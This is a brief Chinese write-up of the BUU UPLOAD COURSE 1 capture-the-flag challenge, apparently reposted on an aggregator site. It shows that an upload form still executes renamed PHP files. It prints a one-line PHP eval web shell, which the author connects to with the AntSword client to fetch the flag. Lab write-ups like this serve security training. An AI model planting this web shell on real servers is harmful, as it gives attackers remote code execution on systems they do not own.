BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)
Posted MangataTS
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)相关的知识,希望对你有一定的参考价值。
题目链接
https://buuoj.cn/challenges#BUU%20UPLOAD%20COURSE%201
思路
我们随便传一张图片试试:
我们发现它给我们重命名了,然后我们再打开试试:
于是我们传入一个php
代码试试
<?php
echo "hello world";
?>
我们发现,虽然文件重命名了,但是还是可以执行php
代码,于是上传一句话木马,然后蚁剑链接即可
<?php
@eval($_POST[456]);
?>
最后flag
在网站的根目录~
注意的是,这里也可以不通过蚁剑链接,而是一句话木马然后接受shell
脚本或者php
代码,然后通过发送post
或者get
请求的方式进行搜索
以上是关于BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)的主要内容,如果未能解决你的问题,请参考以下文章